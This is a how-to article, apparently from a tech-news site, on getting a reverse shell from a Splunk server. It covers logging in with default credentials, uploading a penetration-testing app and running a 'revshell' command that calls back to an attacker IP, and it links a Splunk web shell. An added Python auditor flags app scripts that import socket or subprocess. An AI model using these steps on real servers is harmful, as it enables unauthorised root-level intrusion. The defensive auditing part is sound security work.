How to Install a Custom Application on Splunk to Get a Reverse Shell

2025-01-31 Update From: SLTechnology News&Howtos

This article describes how to install a custom application on Splunk to obtain a reverse shell.

Preface

I run into Splunk every time I test. Splunk is a software platform for searching, analyzing and visualizing data. It usually holds all kinds of data, some of it sensitive, so its value to penetration testers is self-evident.

To gain access to Splunk, you can try to log in by guessing the password or by reusing a password you obtained earlier. In the past, I have used "admin:admin" or "admin:changeme" to log in to the administrative console.

Splunk app

One trick I'm sure a lot of people don't know is to use a Splunk app to execute Python code. The TBG Security team developed a Splunk app that can be used for penetration testing. The app was released as early as 2017. Nevertheless, I think very few people know about this tool, and I think it deserves more attention.

The tool is very simple to use. First, download the latest version from the Splunk Shells GitHub page.

After logging in to the Splunk management console, click the "App" column and then click "Manage Apps".

After entering the Apps panel, click "Install app from file".

Click the browse button and upload the tar.gz file.

After the application is uploaded successfully, Splunk must be restarted. Log in to Splunk after the restart and return to the "Apps" interface. Click "Permissions", and when you see the "Sharing" option, select the "All Apps" radio button.

After installing the app, the last thing you need to do is get the shell. There are several options here, and I chose the standard reverse shell created through Metasploit.

Once the MSF handler (or netcat listener) is up and running, enter the following command to trigger the app:

| revshell SHELLTYPE ATTACKERIP ATTACKERPORT

This will immediately execute the app and get a reverse shell.

The above tests were carried out on Splunk 7.0 and everything went very well! Splunk usually runs as root, which gives attackers the opportunity to enumerate other information about the host, beyond the scope of the database.
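The technique above depends on an uploaded app registering a custom search command (here `revshell`) that is backed by a script. As an added example (not from the original article or from the Splunk Shells project), the Python below audits an apps directory for commands registered in `commands.conf` and flags backing scripts that import process or network modules. The sample app names, script names and the list of suspect modules are assumptions constructed for illustration.

```python
import configparser, re, tempfile
from pathlib import Path

# Assumption: modules a search command rarely needs; a hit means "review by hand".
SUSPECT = {"socket", "subprocess", "pty", "ctypes"}
IMPORT_LINE = re.compile(r"^\s*(?:import|from)\s+(.+)$", re.M)

def suspect_imports(source):
    """Regex-based so Python 2 era scripts are still scanned; not a full parser."""
    found = set()
    for line in IMPORT_LINE.findall(source):
        names = re.split(r"[,\s]+", line.split(" import ")[0])
        found |= {n.split(".")[0] for n in names} & SUSPECT
    return sorted(found)

def audit_apps(apps_dir):
    """List (app, command, script, suspect modules); script defaults to <stanza>.py."""
    findings = []
    confs = Path(apps_dir).glob("*/*/commands.conf")
    for conf in sorted(c for c in confs if c.parent.name in ("default", "local")):
        cp = configparser.ConfigParser(strict=False, interpolation=None, allow_no_value=True)
        # Synthetic first stanza so settings placed before any [stanza] still parse.
        cp.read_string("[__global__]\n" + conf.read_text(errors="replace"))
        app = conf.parent.parent
        for stanza in cp.sections()[1:]:  # [1:] skips the synthetic stanza
            script = cp.get(stanza, "filename", fallback=None) or stanza + ".py"
            path = app / "bin" / script
            src = path.read_text(errors="replace") if path.is_file() else ""
            findings.append((app.name, stanza, script, suspect_imports(src)))
    return findings

def build_sample(root):
    """Constructed sample tree: one app exposing a network-capable command, one benign."""
    files = {
        "sample_shell_app/default/commands.conf": "[revshell]\nfilename = rev.py\n",
        "sample_shell_app/bin/rev.py": "import sys, socket\nfrom subprocess import Popen\n",
        "sample_report_app/default/commands.conf": "[topn]\nfilename = topn.py\n",
        "sample_report_app/bin/topn.py": "import sys, csv\n",
    }
    for rel, text in files.items():
        path = Path(root, rel)
        path.parent.mkdir(parents=True, exist_ok=True)
        path.write_text(text)
    return root

if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        for app, cmd, script, mods in audit_apps(build_sample(tmp)):
            print("REVIEW" if mods else "ok    ", app, cmd, script, mods)
```

Pointing `audit_apps` at `$SPLUNK_HOME/etc/apps` lists every custom search command an installed app has registered, which makes an unexpected entry easy to spot after an app upload.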

Update:

In addition to the above method, you can also use Tevora's splunk_pentest_app; refer to their published articles for more information.

Update again (10/20/2018):

I found an available Splunk web shell: https://github.com/f8al/TA-Shell.
